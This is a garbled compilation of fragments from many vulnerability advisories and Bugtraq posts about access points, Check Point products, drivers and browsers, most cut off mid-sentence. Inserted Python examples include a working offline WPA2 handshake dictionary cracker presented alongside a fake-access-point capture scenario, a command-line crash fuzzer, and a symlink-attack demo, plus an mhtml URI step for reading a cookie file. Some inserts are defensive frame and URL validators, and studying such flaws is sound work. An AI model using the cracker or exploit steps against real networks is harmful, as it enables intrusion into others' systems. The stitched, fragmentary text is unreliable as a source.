SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02544568
Version: 1
HPSBGN02589 SSRT100296 rev.1 - HP ProCurve Access Points, Access Controllers, and Mobility Controllers, Privilege Escalation
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-10-13
Last Updated: 2010-10-13
SEC Consult Vulnerability Lab Security Advisory < 20110810-0 >
=======================================================================
title: Client-side remote file upload & command execution
product: Check Point SSL VPN On-Demand applications (signed
Java applet and ActiveX control)
* SSL Network Extender (SNX)
* SecureWorkSpace
* Endpoint Security On-Demand
supplied by Check Point Connectra or other security
gateways
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
Overview
========
Physical structures which employ automatically locking doors to secure
exit points expose a race condition which may allow unauthorized entry.
Impact
======
Cc: <bugtraq@securityfocus.com>
Subject: Re: Android wireless accepts fake response (No interaction requires)
(Vulnerability ?)
You are not wrong. However, in this case, the point is to capture the "WPA
handshake" (not the WPA key) in order to brute-force the WPA key. This attack
allows an attacker to capture your "WPA handshake" even though the
legitimate access point is not there. The attacker could create a fake
access point to steal the "WPA handshake" (from a client) when you attend
conferences. This attack would not work with iPhone, iPad or other PCs
with Windows OS because they would discard the fake probe response in the
first place.
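The offline step the reply refers to, as an added example that is not part of the original thread or any vendor code: a fake access point chooses ANonce, the victim's supplicant answers with message 2 of the 4-way handshake (SNonce plus a MIC computed from the PMK), and that single frame is enough to test candidate passphrases without the real network being present. The SSID, MAC addresses, nonces and passphrase below are constructed sample values; the key derivation (PBKDF2, PRF-512, HMAC-SHA1 MIC for key descriptor version 2) follows IEEE 802.11i.

```python
import hashlib
import hmac
import struct

# Constructed sample values for the "fake AP" scenario in the thread; they are
# not from a real capture. The attacker runs the AP, so it chooses ANonce.
SSID = b"conference-wifi"
AP_MAC = bytes.fromhex("020000000001")      # fake BSSID (constructed)
CLIENT_MAC = bytes.fromhex("020000000002")  # victim station (constructed)
ANONCE = hashlib.sha256(b"attacker-chosen anonce").digest()
SNONCE = hashlib.sha256(b"client-chosen snonce").digest()
REAL_PASSPHRASE = "correct horse battery"   # known only to the victim

MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 of 802.11i 8.5.1.2; MACs and nonces are ordered min||max as the standard requires."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]   # KCK = ptk[0:16], KEK = ptk[16:32], TK = ptk[32:48]


def eapol_key_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Minimal 4-way handshake message 2 (EAPOL-Key, RSN descriptor) with a zeroed MIC field."""
    body = struct.pack("!BHH", 2, 0x010A, 16)      # descriptor type 2, key info (v2|pairwise|MIC), key length
    body += struct.pack("!Q", 1)                   # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8          # nonce, key IV, RSC, reserved
    body += b"\x00" * 16 + struct.pack("!H", len(key_data)) + key_data  # MIC placeholder, key data
    return struct.pack("!BBH", 1, 3, len(body)) + body                  # EAPOL v1, type 3 (Key)


def client_message2(passphrase: str) -> bytes:
    """What the victim's supplicant sends after the fake AP's message 1 (ANonce)."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE)
    mic = eapol_key_mic(ptk[:16], frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(captured_msg2: bytes, ssid: bytes, aa: bytes, spa: bytes, anonce: bytes, candidates):
    """Offline dictionary attack: only SSID, both MACs, ANonce and the captured message 2 are needed."""
    snonce = captured_msg2[17:49]
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        ptk = ptk_from_pmk(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_key_mic(ptk[:16], captured_msg2), captured_mic):
            return cand
    return None


if __name__ == "__main__":
    capture = client_message2(REAL_PASSPHRASE)          # stands in for the sniffed frame
    wordlist = ["password", "letmein", "correct horse battery", "hunter2"]
    print(crack(capture, SSID, AP_MAC, CLIENT_MAC, ANONCE, wordlist))
```

Because the attacker controls ANonce, it could even fix one nonce value across many victims and precompute; the 4096-round PBKDF2 per candidate is the only cost the defender gets to impose, which is why the thread's point stands: the handshake, not the key, is the asset.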
Hash: SHA1
Dear Kousuke,
First of all, let me clarify that the disclosure process has been
entirely coordinated by me, and thus, Wagner, Conviso and Check Point
have no responsibilities over any mistake I eventually made.
Anyway, just to clarify your points:
> First, you must have reported to the developer, but in what way?
> that Chromium add a feature to mitigate this server-side problem by
> ignoring the RFC and prevent all links with an @ sign in them from
> working altogether like MSIE does or warn the user about such URLs
> like Firefox does? I am obviously missing something here, maybe you
> can elaborate even further?
The point is not one of implementation. The URL/URI specification provided in
the RFC is treated as the standard benchmark, but the point here is about the
security check which is not implemented in Chrome. Every time this issue
comes up, the point of status bar link interpretation is discussed, which is
simply one point of just showing the way links are active in a web page. The
web page input problem is
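The "@ sign in a URL" behaviour the two correspondents argue about, shown as an added example (not code from either of them or from any browser): per RFC 3986 everything before the last "@" in the authority is userinfo, so the browser connects to whatever follows it. The hostnames are placeholders and the decoy heuristic is this example's own, not a rule any browser applies.

```python
from urllib.parse import urlsplit

# Constructed examples; "bank.example" and "evil.example" are placeholders.
SAMPLE_LINKS = [
    "http://www.bank.example/",
    "http://www.bank.example@evil.example/login",
    "http://www.bank.example%2Flogin@evil.example/",
    "https://user@files.example/share",
]


def effective_target(url: str) -> dict:
    """Where the browser will actually connect, plus a flag when the userinfo part
    (everything before '@' in the authority) looks like it was meant to read as a host."""
    parts = urlsplit(url)
    user = parts.username or ""
    # Heuristic (this example's own, not a browser rule): real usernames rarely
    # contain dots or encoded slashes; phishing URLs put a whole hostname there.
    decoy = bool(user) and ("." in user or "%2f" in user.lower())
    return {"scheme": parts.scheme, "host": parts.hostname, "userinfo": user, "decoy_userinfo": decoy}


def classify(urls):
    return {u: effective_target(u) for u in urls}


if __name__ == "__main__":
    for url, info in classify(SAMPLE_LINKS).items():
        flag = " <-- host in userinfo" if info["decoy_userinfo"] else ""
        print(f"{url} -> connects to {info['host']}{flag}")
```

The third sample shows why a plain "is there a slash before the @" check is not enough: an encoded slash (%2F) keeps the whole decoy inside the userinfo component.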
Background
----------
Trango Broadband (www.trangobroadband.com) produces a line of unlicensed
5.3/5.8 GHz point-to-multipoint broadband wireless radios which are used
by many wireless ISPs around the world to provide internet and private
office services to hard-to-reach customers.
Currently there is a flaw in the authentication mechanism of these radios
which, if an attacker knows some details, can allow interception of
R7-0038: Check Point Endpoint Security Server Information Disclosure
February 7, 2011
-- Vulnerability Details:
The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL private keys, sensitive configuration files (often containing passwords), and application binaries.
Examples of exposed files include:
https://server/conf/ssl/apache/integrity-smartcenter.cert
=======================================================================
title: Symlink Following and Second-Order Symlink
Vulnerabilities in Multiple Check Point Security Management Products
product: Check Point Security Management
* Multi-Domain Security Management / Provider-1
* SmartCenter
vulnerable version: multiple products, see sections below
fixed version: multiple products, see sections below
CVE number: CVE-2011-2664
impact: high
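The two bug classes named in the advisory title, symlink following and second-order symlink following, as an added example that is not taken from the advisory or from Check Point's code. It assumes a POSIX system (Linux semantics for O_NOFOLLOW and dir_fd) and builds its own victim file and links in a temporary directory; the directory and file names are constructed.

```python
import errno
import os
import tempfile


def vulnerable_write(path, data):
    # CWE-59: open() follows a symlink at the final component, so a planted link
    # redirects the write to whatever file the link points at.
    with open(path, "w") as f:
        f.write(data)


def create_nofollow(path, data):
    # Hardened: O_EXCL refuses any pre-existing entry (including a dangling link)
    # and O_NOFOLLOW refuses a symlink as the last path component.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def create_in_trusted_dir(directory, name, data):
    # Second-order defence: pin the parent directory first (it must be a real
    # directory, not a link), then create relative to that descriptor.
    if os.sep in name or name in (".", ".."):
        raise ValueError("name must be a single path component")
    dfd = os.open(directory, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        fd = os.open(name, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600, dir_fd=dfd)
        with os.fdopen(fd, "w") as f:
            f.write(data)
    finally:
        os.close(dfd)


def demo():
    """Plays both attacks against the naive and hardened writers; returns what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, "victim.conf")   # constructed stand-in for a config file
        with open(victim, "w") as f:
            f.write("original")
        spool = os.path.join(root, "spool")
        os.mkdir(spool)

        # 1. First order: attacker pre-creates spool/job.tmp -> victim.conf.
        link = os.path.join(spool, "job.tmp")
        os.symlink(victim, link)
        vulnerable_write(link, "attacker controlled")
        with open(victim) as f:
            results["first_order_clobbered"] = f.read() == "attacker controlled"
        try:
            create_nofollow(link, "safe")
            results["first_order_blocked"] = False
        except FileExistsError:
            results["first_order_blocked"] = True

        # 2. Second order: the *directory* component is the link (spool2 -> root),
        # so O_NOFOLLOW on the final component alone does not help.
        linked_dir = os.path.join(root, "spool2")
        os.symlink(root, linked_dir)
        create_nofollow(os.path.join(linked_dir, "dropped.conf"), "x")
        results["second_order_escaped"] = os.path.exists(os.path.join(root, "dropped.conf"))
        try:
            create_in_trusted_dir(linked_dir, "dropped2.conf", "x")
            results["second_order_blocked"] = False
        except OSError as e:
            results["second_order_blocked"] = e.errno in (errno.ELOOP, errno.ENOTDIR)
    return results


if __name__ == "__main__":
    print(demo())
```

The second case is the one advisories of this kind call "second-order": no single open() call follows a link at its last component, yet the file still lands outside the intended directory because an earlier path element was replaced.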
please let me call you in this way as Hugo talking with Hugo -Vazquez- sounds a bit confusing... :-)
Regarding with this:
>I think however that Check Point consideres >everyone with access to a
>Secure Platform system to be a trusted user. So >they will not regard these
>issues with the priority you (Hugo Vázquez) seem to bestow on it.
Right now -16 October 2007- Check Point has already accepted the flaws. Regarding the privilege escalation to the "Expert" mode -standard root-, I should tell again that that is the minor problem. If you read the paper you will see that there are things more interesting to explore... Anyway, today, "googling" a bit I found an interesting URL of the NIST:
"FIPS 140-2 Non-Proprietary Security Policy"
* Airline Product Set (ALPS)
* Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
* Native Client Interface Architecture support (NCIA)
* Data-link switching (DLSw)
* Remote Source-Route Bridging (RSRB)
* Point to Point Tunneling Protocol (PPTP)
* X.25 for Record Boundary Preservation (RBP)
* X.25 over TCP (XOT)
* X.25 Routing
Information on how to determine whether an affected feature is
Vulnerability present also on firmware ver.3.04.03 (US)
Other models and/or firmware versions may be also affected.
Background Information:
Linksys WAP54G is a wireless access point that allows wireless clients
connectivity to wired networks.
It supports the 802.11b and 802.11g protocols, with data rates up to 54Mbit/s.
Summary:
3. Technical Description.
This driver is in charge of intercepting when a packet arrives or is
sent. (Un)fortunately a simple user-mode program can modify some
callbacks in klim5.sys to point to a user-mode controlled address, just
by sending a specially crafted IOCTL request. So... we face a local
privilege escalation. Again.
.text:00011774 cmp ecx, 80052110h ; IOCTL
.text:0001177A jnz short loc_117E9
------
* Marvell Driver Null SSID Association Request Vulnerability
Summary:
------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Netgear WN802T) do not correctly parse the SSID information
element included in association requests. Most information elements are
used by the wireless access point and clients to advertise their
capabilities (regarding rates, network name, cryptographic
capabilities...). More precisely, the SSID is used by the access point
>But then there is the important concept of the "private 0day", a new
>vulnerability that a malicious person has but has not used yet.
But the point is there is no such thing as a 0day *vulnerability*; there's
a 0day exploit, an exploit in the wild before the vulnerability is
discovered.
By claiming all "new" vulnerabilities are 0day the term becomes completely
meaningless; by your reasoning there is no such thing as a non-0day
Check Point Zone Labs VSDATANT Multiple IOCTL Privilege Escalation
Vulnerabilities
iDefense Security Advisory 08.20.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 20, 2007
I. BACKGROUND
Zone Alarm products provide security solutions such as anti-virus,
Dear List,
I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Memory corruption when Adobe Shockwave Player parses .dir media file (duplicated KEY* reference in mmap record)
CVE-2010-4088
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453
INTRODUCTION
Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal
1. Rodrigo (or Wagner) reported this vulnerability to the developer
2. The developer released a new version to fix the XSS
3. Rodrigo (and/or Wagner) confirmed that fix
4. Rodrigo reports this vulnerability to this list
However, this is not true. The developer of cforms didn't fix this XSS at this point.
So what has he "fixed"? See the following diff:
--- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000 +0900
+++ cforms-v11.6.1/lib_ajax.php 2010-09-22 07:41:54.000000000 +0900
Advisory # 1:
TITLE
OS Command Injection Vulnerability in Aruba Remote Access Point
Diagnostic Web Interface.
SUMMARY
An OS command injection vulnerability has been discovered in the Aruba
------
* Atheros Driver Reserved Frame Vulnerability
Summary:
--------
* The wireless driver in some Wi-Fi access points (such as the
ATHEROS-based Netgear WNDAP330) does not correctly parse malformed
reserved management frames.
Assigned CVE:
-------------
-----Original Message-----
From: hvazquez@pentest.es [mailto:hvazquez@pentest.es]
Sent: Monday, October 01, 2007 6:16 AM
To: bugtraq@securityfocus.com
Subject: CheckPoint Secure Platform Multiple Buffer Overflows
Hi all,
we have published a paper about CheckPoint Firewall-1 vulnerabilities. The platform tested is the Secure Platform R60. We have found many buffer overflows. Most of them are located in command line utilities that can be exploited locally. A very few of them may be exploitable remotely, we don't know...
It seems that there's no need to be worried about these vulnerabilities, as it seems that none of them can be exploited from remote -right now-. What looks interesting to us is the hacking process of the target of evaluation.
As many of you know, the Check Point Secure Platform R60 was certified with the EAL4+ Common Criteria assurance level.
Our tests to locate those vulnerabilities -many memory corruption problems- had been very simple so we are a bit scared about the degree of reliability of the CheckPoint development cycle. In the paper called: "Check Point VPN-1/FireWall-1 NGX Security Target Version 1.2.2" and prepared to achieve the certification, there is a statement like this: "the developer has systematically searched for vulnerabilities in the TOE and provides reasoning about why they cannot be exploited in the intended environment for the TOE".
Systematically? We have found several overflows simply by manual fuzzing arguments of binaries from command line....
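The "manual fuzzing of arguments from the command line" the post describes, written out as an added example that is not the authors' tooling: grow one argv slot until the target dies by signal, and read the signal name out of the negative return code. The target here is a constructed stand-in (a Python one-liner that raises SIGSEGV on itself past 1000 bytes); point it at a real binary by replacing STAND_IN with that binary's argv.

```python
import signal
import subprocess
import sys


def run_once(argv, timeout=10):
    """Run the target once; return the signal name if it was killed by one, "timeout", or None."""
    try:
        proc = subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=timeout)
    except subprocess.TimeoutExpired:
        return "timeout"
    if proc.returncode < 0:                      # POSIX: negative return code = killed by signal
        return signal.Signals(-proc.returncode).name
    return None


def fuzz_argv(argv, index, lengths=(64, 256, 1024, 4096, 16384), fill="A"):
    """Replace argv[index] with ever longer strings; report the first length that crashes the target."""
    for n in lengths:
        candidate = list(argv)
        candidate[index] = fill * n
        outcome = run_once(candidate)
        if outcome is not None:
            return {"length": n, "outcome": outcome, "argv_index": index}
    return None


# Stand-in target (constructed): a Python one-liner that raises SIGSEGV on itself once its
# argument exceeds 1000 bytes, mimicking an unchecked strcpy() into a 1 KB stack buffer.
STAND_IN = [sys.executable, "-c",
            "import os, signal, sys\n"
            "if len(sys.argv[1]) > 1000:\n"
            "    os.kill(os.getpid(), signal.SIGSEGV)", "ARG"]
# Constructed control target that handles any length.
ROBUST = [sys.executable, "-c", "import sys; len(sys.argv[1])", "ARG"]

if __name__ == "__main__":
    print(fuzz_argv(STAND_IN, 3))
    # Against a real binary: fuzz_argv(["/path/to/cli_tool", "--option", "ARG"], 2)
```

A SIGSEGV or SIGBUS at a length that scales with the payload is the cheap signal the post relies on; SIGABRT usually means a stack protector or heap check fired, which is still a finding but a different one.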
------
* Marvell Driver Multiple Information Element Overflows
Summary:
--------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Linksys WAP4400N) do not correctly parse information
elements included in association requests. Most information elements are
used by the wireless access point and clients to advertise their
capabilities (regarding rates, network name, cryptographic capabilities...).
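The information element parsing that the Marvell null-SSID, Marvell multiple-IE-overflow and Atheros reserved-frame advisories on this page all turn on, as an added example that is none of those vendors' driver code: each tagged parameter is (id, length, data), and a driver that copies the SSID using the on-air length into a fixed 32-byte buffer, or dereferences an empty SSID in an association request, is exactly what these bulletins describe. The frames below are constructed, not captures.

```python
import struct

EID_SSID = 0
MAX_SSID_LEN = 32
ASSOC_REQ_FIXED = 4   # capability info (2) + listen interval (2) precede the IEs


class MalformedFrame(ValueError):
    pass


def parse_ies(buf: bytes):
    """Walk the tagged parameters (id, len, data) with every length checked against the frame."""
    ies = []
    off = 0
    while off < len(buf):
        if off + 2 > len(buf):
            raise MalformedFrame(f"truncated IE header at offset {off}")
        eid, elen = buf[off], buf[off + 1]
        body = buf[off + 2:off + 2 + elen]
        if len(body) != elen:
            raise MalformedFrame(f"IE {eid} claims {elen} bytes but only {len(body)} remain")
        if eid == EID_SSID and elen > MAX_SSID_LEN:
            raise MalformedFrame(f"SSID IE length {elen} exceeds {MAX_SSID_LEN}")
        ies.append((eid, body))
        off += 2 + elen
    return ies


def naive_ssid_copy_length(buf: bytes) -> int:
    """The pattern the advisories describe: trust the on-air length when copying the SSID into a
    fixed 32-byte buffer. Returns how many bytes such a memcpy would write, so > 32 means overflow."""
    off = 0
    while off + 2 <= len(buf):
        if buf[off] == EID_SSID:
            return buf[off + 1]
        off += 2 + buf[off + 1]
    return 0


def assoc_request_ssid(frame: bytes) -> bytes:
    """Association request: the SSID IE must be present and, unlike a probe request's wildcard, non-empty."""
    if len(frame) < ASSOC_REQ_FIXED:
        raise MalformedFrame("frame shorter than the fixed fields")
    ssids = [body for eid, body in parse_ies(frame[ASSOC_REQ_FIXED:]) if eid == EID_SSID]
    if len(ssids) != 1:
        raise MalformedFrame(f"expected exactly one SSID IE, found {len(ssids)}")
    if not ssids[0]:
        raise MalformedFrame("null SSID is not valid in an association request")
    return ssids[0]


def rejects(frame: bytes) -> bool:
    try:
        assoc_request_ssid(frame)
    except MalformedFrame:
        return True
    return False


def ie(eid: int, body: bytes, claimed_len=None) -> bytes:
    """Build one IE; claimed_len lets a test lie about the length, as a malformed frame would."""
    return bytes([eid, len(body) if claimed_len is None else claimed_len]) + body


def assoc_request(*ies_bytes: bytes) -> bytes:
    return struct.pack("<HH", 0x0431, 10) + b"".join(ies_bytes)   # constructed capability/listen interval


# Constructed frames (not real captures)
GOOD = assoc_request(ie(EID_SSID, b"conference-wifi"), ie(1, bytes([0x82, 0x84, 0x8B, 0x96])))
OVERSIZED_SSID = assoc_request(ie(EID_SSID, b"A" * 200))
NULL_SSID = assoc_request(ie(EID_SSID, b""))
TRUNCATED = assoc_request(ie(1, b"\x82\x84", claimed_len=50))

if __name__ == "__main__":
    print(assoc_request_ssid(GOOD))
    print("naive copy would write", naive_ssid_copy_length(OVERSIZED_SSID[ASSOC_REQ_FIXED:]), "bytes")
    for name, frame in [("oversized", OVERSIZED_SSID), ("null", NULL_SSID), ("truncated", TRUNCATED)]:
        print(name, "rejected:", rejects(frame))
```

The oversized case is the overflow; the truncated case is the over-read (the driver walks past the end of the receive buffer); the null case is the null-SSID association request from the WN802T advisory, where the element is syntactically valid but semantically wrong for that frame type.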
To be clear, I fully understand that when operating in an advanced mode,
Microsoft claims that hibernate mode clears the cryptographic keys from
memory. This claim was tested and we did not recover keys after a
machine configured for the advanced mode went into a hibernating state.
However, my point was _not_ that in a very specific configuration you're
at risk directly after power off. If you get to direct the machine into
such a hibernated state, you may be just fine.
My point was that a machine configured with multi-factor authentication
is still at risk. Regardless of how many password dongles you use,
</SCRIPT>
</BODY>
</HTML>
- -----------/
Point your IE to the following URI, replacing USERNAME with the
currently logged in user name.
/-----------
mhtml:\\127.0.0.1\C$\Documents%20and%20Settings\USERNAME\Cookies\evilCookie.txt
You can disable the reporting feature. For information about how to disable the reporting component and how to prevent this tool from sending information to Microsoft, click the following article umber to view the article in the Microsoft Knowledge Base:
891716 (http://support.microsoft.com/kb/891716/) Deployment of the Microsoft Windows Malicious Software Removal Tool in an enterprise environment
======
Either I am missing the point of J. Oquendo's post, or the conclusions I think he reaches are speculation rather than established.
Cheers
Ken
> -----Original Message-----
------
* Marvell Driver EAPoL-Key Length Overflow
Summary:
--------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Netgear WN802T) do not correctly parse malformed EAPoL-Key
packets. This packet is used for unicast/multicast key derivation (which
are called 4-way handshake and group key handshake) of any secure
wireless connection (WPA-PSK, WPA2-PSK, WPA-EAP, WPA2-EAP).
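The length check that the EAPoL-Key advisory implies is missing, as an added example that is not the Marvell driver's code: an EAPOL-Key frame carries two length fields (the EAPOL body length and the key data length), and a parser must validate both against the bytes actually received before copying. The frames are built by the example's own constructed builder, which can deliberately lie about either length.

```python
import struct

EAPOL_HDR = struct.Struct("!BBH")                  # version, type, body length
KEY_HDR = struct.Struct("!BHHQ32s16s8s8s16sH")     # descriptor type .. key data length (95 bytes)
EAPOL_KEY = 3


class MalformedEapol(ValueError):
    pass


def parse_eapol_key(frame: bytes) -> dict:
    """Parse an EAPOL-Key frame, checking every length field against the bytes actually received."""
    if len(frame) < EAPOL_HDR.size:
        raise MalformedEapol("short EAPOL header")
    version, ptype, body_len = EAPOL_HDR.unpack_from(frame)
    if ptype != EAPOL_KEY:
        raise MalformedEapol(f"not an EAPOL-Key frame (type {ptype})")
    body = frame[EAPOL_HDR.size:]
    if body_len > len(body):
        raise MalformedEapol(f"EAPOL length {body_len} exceeds received {len(body)} bytes")
    body = body[:body_len]
    if len(body) < KEY_HDR.size:
        raise MalformedEapol("short EAPOL-Key header")
    (desc, key_info, key_len, replay, nonce, iv, rsc, _rsv, mic, kd_len) = KEY_HDR.unpack_from(body)
    key_data = body[KEY_HDR.size:]
    if kd_len != len(key_data):
        # The bug class here: a driver that memcpy()s kd_len bytes trusts this field.
        raise MalformedEapol(f"key data length {kd_len} but {len(key_data)} bytes present")
    return {"version": version, "descriptor": desc, "key_info": key_info, "key_len": key_len,
            "replay": replay, "nonce": nonce, "mic": mic, "key_data": key_data}


def build_eapol_key(nonce: bytes, key_data: bytes, claimed_kd_len=None, claimed_body_len=None) -> bytes:
    """Constructed frame builder; the claimed_* arguments lie about lengths to mimic a malformed packet."""
    kd_len = len(key_data) if claimed_kd_len is None else claimed_kd_len
    body = KEY_HDR.pack(2, 0x010A, 16, 1, nonce, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,
                        b"\x00" * 16, kd_len) + key_data
    body_len = len(body) if claimed_body_len is None else claimed_body_len
    return EAPOL_HDR.pack(1, EAPOL_KEY, body_len) + body


def rejects(frame: bytes) -> bool:
    try:
        parse_eapol_key(frame)
    except MalformedEapol:
        return True
    return False


# Constructed sample frames (not captures)
NONCE = bytes(range(32))
GOOD = build_eapol_key(NONCE, b"\x30\x02\x01\x00")            # a short, well-formed key data blob
OVERSIZED_KEY_DATA = build_eapol_key(NONCE, b"", claimed_kd_len=0xFFFF)
OVERSIZED_BODY = build_eapol_key(NONCE, b"", claimed_body_len=0xFFFF)

if __name__ == "__main__":
    print(parse_eapol_key(GOOD)["key_data"])
    for name, frame in [("key data", OVERSIZED_KEY_DATA), ("body", OVERSIZED_BODY), ("truncated", GOOD[:50])]:
        print(name, "rejected:", rejects(frame))
```

Note the order of checks: the EAPOL body length is reconciled first, then the key data length is reconciled against what is left inside that body, so a lie in either field is caught before anything is copied.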